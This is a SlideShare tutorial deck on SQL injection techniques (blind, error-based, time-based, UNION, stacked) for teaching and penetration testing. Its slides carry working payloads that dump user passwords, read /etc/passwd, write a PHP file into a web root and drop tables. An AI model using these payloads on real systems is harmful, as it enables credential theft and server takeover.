SlideShare a Scribd company logo
1 of 45
Download to read offline
SQL Injection 101 
It is not just about ' or '1'='1 
pichaya@ieee.org 
fb.com/index.htmli 
linkedin.com/in/pich4ya 
Pichaya Morimoto
Legal Warning 
พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ 
มาตรา 5 
ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ 
พาะและมาตรการนั้นมิได้มีไว้สำหรับตน 
โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท 
มาตรา 7 
ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ 
พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน 
โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท 
มาตรา 9 
ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ 
บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ 
โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
Overview 
★ Anatomy of SQL Injection Attack 
★ Injection Techniques 
○ B-E-T-U-S 
★ Privilege Escalation 
○ File & RCE 
★ Advanced Attacks 
★ Case Studies
What is SQL Injection 
“A SQL injection attack consists 
of insertion or "injection" of a 
SQL query via the input data from 
the client to the application.” 
- https://www.owasp.org/index.php/SQL_Injection 
Web 
Application 
User inject a specially 
crafted SQL as input to 
manipulate results 
Application Users 
via client programs 
Input Entry Points 
(Search box, Forms, Article ID, 
Session ID, HTTP headers etc.) 
Database
Very Popular among Hackers
Impact on SQL Injection 
In general, consider SQL Injection a high impact severity. 
Technical Impacts Business Impacts 
★ Data losses 
★ Bypass Authentications 
★ Denial of access 
★ Lead to host takeover 
★ All data could be stolen, 
modified, or deleted. 
★ Could your reputation be 
harmed? 
* https://www.owasp.org/index.php/Top_10_2013-A1-Injection 
* https://www.owasp.org/index.php/SQL_Injection
Exploitation Complexity 
95% 4% 1% 
Very Hard Lunatic 
Easy (Required 
an Expert) 
(Maze queries, 2nd order, 
Blind, Complex App Logic, 
Bypass Filters/WAF etc.) 
SQL injection with Havij by 3 year old
A Ton of Tools 
★ Automated SQL injection Tools 
SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, 
BobCat, bSQLHacker, bSQLbf, Absinthe, 
SQLBrute, Squeeza, SQL Power Injector etc. 
★ Web Vulnerability Scanner 
○ Commercial 
Acunetix, Netsparker, IBM AppScan,HP Fortify, 
HP WebInspect, BurpSuite Pro, Qualys WAS etc. 
○ Free 
W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.
Tool == Super Easy ?
Tool == Super Easy ?
Tools there, why learn to SQLi? 
1. When tools failed to exploit? 
2. False Positive 
★ Complex Database Query 
★ Complex Application Logic 
★ Encodings & Blacklist Filters 
★ Post Authen-ed 
★ Anti-CSRF Token 
★ Non-SELECT statements 
★ Programmer is so indy 
3. It’s just fun, and sometimes can make good money... 
In case you are penetration tester, or just a Zero-day hunter ;) 
Popular websites already scanned by those available tools. 
It is very challenge, if you can find flaws that overlooked by tools.
Quote from a Hacker 
“แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่ 
แฮกเว็บได้ 1,000 เว็บ แต่เป็น 
แฮกเกอร์ที่แฮกเว็บเดิมได้ 
1,000 ครั้ง โดยที่โดน 
แพทช์ไปแล้วทุกครั้ง” 
ตาเล็ก Windows98SE
SQL Injection Techniques 
1. Boolean-based blind 
2. Error-based 
3. Time-based blind 
4. UNION query-based 
5. Stacked queries
Boolean-based blind technique 
★ Inject SQL string to control result to be 
TRUE or FALSE using boolean algebra 
★ You can determine whether T/F based on 
analysis of HTTP responses 
(string/regex/page length/HTTP status) 
★ Retrieve arbitrary data: 
○ Sub-Queries with “SELECT” + 
Conditions (CASE-WHEN, IF-THEN)
Example of Vulnerable Code 
User Input 
TITLE 
insert into 
SQL query 
TRUE case : title = naruto FALSE case : title = abc123
Boolean-based blind : Probe 
★ title = naruto 
SQL : SELECT * FROM bookshop WHERE title='naruto' 
Result : found (TRUE) 
★ title = abc123 
SQL : SELECT * FROM bookshop WHERE title='abc123' 
Result : not found (FALSE) 
★ title = naruto' and '1'='1 
SQL : ..WHERE title='naruto' and '1'='1' 
Result : found (TRUE) 
★ title = naruto' and 1=2-- - 
SQL : ..WHERE title='naruto' and 1=2-- -' 
Result : found (FALSE) 
Insert another 
TRUE condition 
connected with 
‘AND’ 
operator 
MySQL 
comments 
-- - 
# 
/**/ 
T & T = T 
T & F = F
Boolean-based blind : Exploit 
★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- - 
Result: found (TRUE) 
★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- - 
Result: not found (FALSE) 
★ title=naruto' and 'cat'= 
(if(database()='owasp_db','cat','dog'))-- - 
Result: found (TRUE) 
★ title=naruto' and 'cat'= 
(if(mid(database(),1,1)='a','cat','dog'))-- - 
Result: not found (not starts with ‘a’) … b … c ... 
★ title=naruto' and 'cat'= 
(if(mid(database(),1,1)='o','cat','dog'))-- - 
MySQL IF function 
IF( 
<condition>, 
<return when TRUE>, 
<return when FALSE> 
) 
MySQL substring 
functions 
1. SUBSTRING 
(str, pos, len) 
2. SUBSTR 
(str, pos, len) 
3. MID(str, pos, len) 
Result: found (starts with ‘o’), then go to next character.
Example of Vulnerable Code 
$email=$_POST['email']; 
$password=$_POST['password']; 
$sql="SELECT * FROM users WHERE (email='$email')"; 
$sql.=" AND (password='$password')"; 
$result = mysql_query($sql); 
if(mysql_num_rows($result)){ 
die(header('location: member.php')); 
}else{ 
die(header('HTTP/1.0 401 Unauthorized')); 
} 
True (Login successful) 
HTTP/1.1 302 Found 
location: member.php 
False (Login failed) 
HTTP/1.0 401 
Unauthorized 
Unvalidated 
User Input 
Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1" 
… WHERE (email='a') AND (password='')||(2>'1') 
Always TRUE
Boolean-based blind : Exploit 
password=1' or 
2>(if(mid((select password from users),1,1)='a',1,3))-- - 
HTTP/1.0 401 Unauthorized 
Char Pos : 1 
password=1' or 
from first record of password column 
2>(if(mid((select password from users),1,1)='b',1,3))-- - 
HTTP/1.0 401 Unauthorized 
... 
password=1' or 
2>(if(mid((select password from users),1,1)='t',1,3))-- - 
HTTP/1.1 302 Found 
location: member.php 
If Char Pos 1 equals to ‘a’ then 
return 1, otherwise return 3 
When result is in TRUE case 
that means 1st char is current value ( ‘t’ )
Boolean-based blind : Exploit 
password=1' or 
2>(if(mid((select password from users),2,1)='a',1,3))-- - 
HTTP/1.0 401 Unauthorized 
Go To 
next 
Repeat steps until you character 
get all text from the 
results! 
Tip: Find length(<query>)
Boolean-based blind : Exploit 
Look for automate way ? if the flaw is not too 
complicate then we can just switch to SQLMap. 
But keep in mind, there are A LOT of tricky 
patterns that tools cannot figure out how to evaluate 
as TRUE or FALSE, so just write your own script! 
Faster blind test algorithms: 
★ Bisection algorithm (binary search) 
★ Bit-shift algorithm 
★ Regular Expression search
Error-based : Concept 
★ Inject specially crafted invalid SQL syntax 
★ Ideally, force web application to expose 
Error Message which contains 
the injection results 
★ Methods depend solely on DBMS 
★ Rarely found in production webapps
Example of Vulnerable Code 
function search_book($title){ 
global $con; 
$sql = "SELECT * FROM bookshop WHERE title='".$title."'"; 
$result = mysql_query($sql) or die(mysql_error($con)); 
if(mysql_num_rows($result)){ 
return 'found'; 
}else{ 
return 'not found'; 
} 
Show Database Error 
Message when query 
result in an error 
} 
$book_title = $_GET['title']; 
$book_status = search_book($book_title); 
echo '<h1>Result: '.$book_status.'</h1>';
Error-based : Exploit 
http://url/searchbook.php?title=' 
and extractvalue(rand(), 
concat(0x3a, 
(select concat(user(),database())) 
))-- -
Error-based : Exploit 
http://url/searchbook.php?title=' 
and extractvalue(rand(), 
concat(0x3a, 
(select concat_ws(0x3a,email,password) 
from users limit 2,1) 
))-- - 
Caution 
Error messages 
has limit number 
of allowed length, 
so what? 
length() + mid() ;)
Time-based blind : Concept 
★ Inject valid SQL string to 
○ wait for few seconds in TRUE 
conditions and … 
○ longer/shorter delay for FALSE 
★ Analysis on response time to determine 
the result of queries 
★ Take long time to get result but very 
useful to hack completely blind flaws
Example of Vulnerable Code
Time-based blind : Exploit 
newbook.php?title=aaa&author=bbb'+ 
if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))--+- 
SQL: INSERT INTO bookshop(title,author) values 
('aaa','bbb'+if(ord(mid((select version()),12,1)) 
>108,sleep(5),sleep(10)))-- -') 
TRUE case : sleep(5) , delay 5 seconds 
FALSE case : sleep(10), delay 10 seconds 
Delay 5 seconds
Time-based blind : Exploit 
Write a script to automate the attack ! 
For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
Time-based blind : Exploit 
sleep() 
executed !
UNION query-based : Concept 
★ Most popular method found in SQL 
injection tutorials from Google/YouTube 
★ Inject valid SQL string by making the 
left-side SELECT to be false and then 
insert “UNION” with another right-side 
SELECT query using same number of 
columns contain what you want to fetch.
Example of Vulnerable Code 
Unvalidated parameter ‘author’ 
pass into SQL query
UNION query-based : Exploit 
Step 1 : Find columns of left SELECT statement using ‘ORDER BY’ 
http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- - 
There are column no. 1 - 4 in 
underlying SELECT query 
There is no 5th 
column. If db error 
msg on, u will see: 
Unknown column '5' in 
'order clause'
UNION query-based : Exploit 
Step 2.1 : We do not need result from 1st SELECT SQL query so 
discard it with ‘always FALSE’ condition. 
http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- - 
Step 2.2 : Insert 2nd SELECT SQL query separated by UNION 
http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 
UNION select 1,2,3,4-- - 
Result of 
“SELECT 
1,2,3,4” will 
replace where 
the result of 1st 
SELECT was.
UNION query-based : Exploit 
Exploit : http://owasp-sqli. 
local/showbook.php 
?author=longcat' and 1>2 union 
select user(),database(),version(), 
(select group_concat(email, 
password) from users)--+- 
Tips: Database Meta Data 
select database() 
select table_name from 
information_schema.tables 
select column_name from 
information_schema.columns
Stacked Queries : Concept 
★ Append another query into the injection 
★ Not All DBMS drivers/API support 
stacked queries 
★ Very Effective for MS-SQL, SQLite 
Attack Scenario: 
User Input = 123 
SQL: SELECT email FROM users where id=123 
User Input = 456; DROP table users 
SQL: ... users where id=456; DROP table users
Example of Vulnerable Code
Stacked queries : Exploit
Privilege Escalation 
★ Read credential from configuration files 
★ Create Accessible Web Backdoor 
★ Arbitrary OS command execution
SQL Injection : Read File 
Exploit: http://owasp-sqli.local/showbook.php 
?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
SQL Injection : Write File 
Exploit: http://owasp-sqli.local/showbook.php 
?author=longcat' and 1>2 union select 
0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile 
'/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
SQL Injection : OS CMD Shell 
1. Write File > Web Backdoor 
( ex. http://youtube.com/watch?v=QIXTPPBfLyI ) 
2. Built-in OS command functions / UDF 
MS-SQL xp_cmdshell
Advanced Attacks 
★ MySQL Second Order SQL Injection 
★ Abusing PHP PDO prepared statements 
★ Making a Backdoor with SQLite 
★ How a hashed string causes SQL Injection flaw 
★ Account Takeover with SQL Truncation Attack 
★ CodeIgniter Active Record Bypass
Next Time :s
Thanks! Need More? 
Good Resources 
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) 
https://www.owasp.org/index.php/Blind_SQL_Injection 
http://websec.ca/kb/sql_injection 
https://github.com/sqlmapproject/sqlmap 
http://www.amazon.com/Injection-Attacks-Defense-Second-Edition/dp/1597499633 
Build your own SQL Injection Playground 
https://github.com/SpiderLabs/MCIR/tree/master/sqlol 
https://github.com/Audi-1/sqli-labs 
https://github.com/sqlmapproject/testenv 
https://www.owasp.org/index. 
php/OWASP_Broken_Web_Applications_Project 
https://pentesterlab.com/exercises/web_for_pentester/ 
https://pentesterlab.com/exercises/from_sqli_to_shell_II/ 
https://pentesterlab. 
com/exercises/from_sqli_to_shell_pg_edition/

More Related Content

What's hot (20)

SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecurity
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql injection
Sql injectionSql injection
Sql injection
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the database
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection attack
SQL Injection attackSQL Injection attack
SQL Injection attack
 

Viewers also liked

Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Pichaya Morimoto
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web SiteFrom SQL Injection & XSSProtecting Your Web SiteFrom SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheLeslie Samuel
 
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Pichaya Morimoto
 
From Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutesFrom Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutesPichaya Morimoto
 
[Jarkom] Teknik penyaluran sinyal
[Jarkom] Teknik penyaluran sinyal[Jarkom] Teknik penyaluran sinyal
[Jarkom] Teknik penyaluran sinyalYode Arliando
 
SQL Injection dan XSS
SQL Injection dan XSSSQL Injection dan XSS
SQL Injection dan XSSYode Arliando
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Exploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesExploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesPichaya Morimoto
 
Threat modeling librarian freedom conference
Threat modeling   librarian freedom conferenceThreat modeling   librarian freedom conference
Threat modeling librarian freedom conferenceevacide
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 

Viewers also liked (20)

Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web SiteFrom SQL Injection & XSSProtecting Your Web SiteFrom SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
 
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101
 
From Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutesFrom Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutes
 
[Jarkom] Teknik penyaluran sinyal
[Jarkom] Teknik penyaluran sinyal[Jarkom] Teknik penyaluran sinyal
[Jarkom] Teknik penyaluran sinyal
 
SQL Injection dan XSS
SQL Injection dan XSSSQL Injection dan XSS
SQL Injection dan XSS
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Exploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesExploiting Blind Vulnerabilities
Exploiting Blind Vulnerabilities
 
Threat modeling librarian freedom conference
Threat modeling   librarian freedom conferenceThreat modeling   librarian freedom conference
Threat modeling librarian freedom conference
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 

Similar to SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampFelipe Prado
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionAhmed AbdelSatar
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersChema Alonso
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQL2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQLHung-yu Lin
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousFrancis Alexander
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
SQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity MeetupSQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity MeetupJanith Malinga
 
Simple web security
Simple web securitySimple web security
Simple web security裕夫 傅
 
Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Hongyang Wang
 

Similar to SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto (20)

DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through Injections
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Sq li
Sq liSq li
Sq li
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scanners
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQL2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQL
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaser
 
SQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity MeetupSQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity Meetup
 
Simple web security
Simple web securitySimple web security
Simple web security
 
Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)
 
Google Dorks and SQL Injection
Google Dorks and SQL InjectionGoogle Dorks and SQL Injection
Google Dorks and SQL Injection
 

More from Pichaya Morimoto

ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...Pichaya Morimoto
 
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationSecuring and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationPichaya Morimoto
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOpsPichaya Morimoto
 
Mysterious Crypto in Android Biometrics
Mysterious Crypto in Android BiometricsMysterious Crypto in Android Biometrics
Mysterious Crypto in Android BiometricsPichaya Morimoto
 
Web Hacking with Object Deserialization
Web Hacking with Object DeserializationWeb Hacking with Object Deserialization
Web Hacking with Object DeserializationPichaya Morimoto
 
Burp Extender API for Penetration Testing
Burp Extender API for Penetration TestingBurp Extender API for Penetration Testing
Burp Extender API for Penetration TestingPichaya Morimoto
 
Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ Pichaya Morimoto
 
Pentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPichaya Morimoto
 
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?Pichaya Morimoto
 

More from Pichaya Morimoto (9)

ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
 
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationSecuring and Hacking LINE OA Integration
Securing and Hacking LINE OA Integration
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOps
 
Mysterious Crypto in Android Biometrics
Mysterious Crypto in Android BiometricsMysterious Crypto in Android Biometrics
Mysterious Crypto in Android Biometrics
 
Web Hacking with Object Deserialization
Web Hacking with Object DeserializationWeb Hacking with Object Deserialization
Web Hacking with Object Deserialization
 
Burp Extender API for Penetration Testing
Burp Extender API for Penetration TestingBurp Extender API for Penetration Testing
Burp Extender API for Penetration Testing
 
Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ
 
Pentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research Laboratory
 
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
 

Recently uploaded

Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作qr0udbr0
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfStefano Stabellini
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...confluent
 
Cyber security and its impact on E commerce
Cyber security and its impact on E commerceCyber security and its impact on E commerce
Cyber security and its impact on E commercemanigoyal112
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
